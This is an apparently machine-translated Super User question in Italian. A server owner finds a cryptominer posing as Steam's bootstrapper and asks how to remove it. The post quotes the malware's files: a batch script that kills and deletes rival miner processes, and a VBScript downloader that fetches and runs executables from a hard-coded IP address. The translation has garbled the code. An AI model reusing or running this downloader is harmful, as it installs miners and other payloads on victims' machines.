windows - Come uccidere in modo permanente il client bootstrapper di Steam - Super User

Ho la seguente situazione nel mio task manager:

Non so che tipo di app è, ma sicuramente non è il bootstrapper del client Steam perché non l'ho installato e non posso disinstallarlo.

Se provo a capire che tipo di app è tramite questo passaggio:

Vedo qualcosa del genere:

Nell'utilità di MS Config non ho trovato nulla che assomigli a secury.exe.

Quando apro il percorso del file, vedo tre file:

m.bat, b.exe, 4.vbs.

Di seguito il contenuto di m.bat:

taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Process.exe taskkill / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe del C: \ Windows \ System32 \ soiuos.exe del C: \ Windows \ Setup \ TrustedInstaller.exe del C: \ ProgramData \ kingsoft.exe del C: \ ProgramData \ expl0rer.exe del C: \ ProgramData \ ieplare.exe del C: \ ProgramData \ nssm.exe del C: \ ProgramData \ MSASCui.exe del C: \ Pro gramData \ SystemSettlngs.exe del C: \ ProgramData \ SystemSetting.exe del C: \ ProgramData \ Process.exe del C: \ ProgramData \ winlnlt.exe del C: \ ProgramData \ WindowsUpgrade.exe del C: \ ProgramData \ msdc.exe del C: \ ProgramData \ Fiddlere.exe del C: \ ProgramData \ shovst.exe del C: \ ProgramData \ lqrtqe.exe del C: \ ProgramData \ apkls.exe del C: \ ProgramData \ winlog.exe del C: \ ProgramData \ svchosts.exe del C: \ ProgramData \ win1ogins.exe del C: \ ProgramData \ shovsts.exe del C: \ ProgramData \ fcty.exe del C: \ ProgramData \ pool.exe del C: \ ProgramData \ pool2.exe del C: \ ProgramData \ pool3.exe

Avanti va 4. Vbs:

Imposta xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Imposta sGet = CreateObject ("ADODB.Stream") ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell"). Eseguire "C: \ ProgramData \ pool3.exe" CreateObject ( "WScript.Shell"). Esegui "del C: \ ProgramData \ pool3.exe"

Cosa posso fare per fermare secury.exe da abusi dei poteri di calcolo del mio server?

PS Ho eseguito Avast controllo completo del mio computer, ma non ha trovato nulla di sbagliato.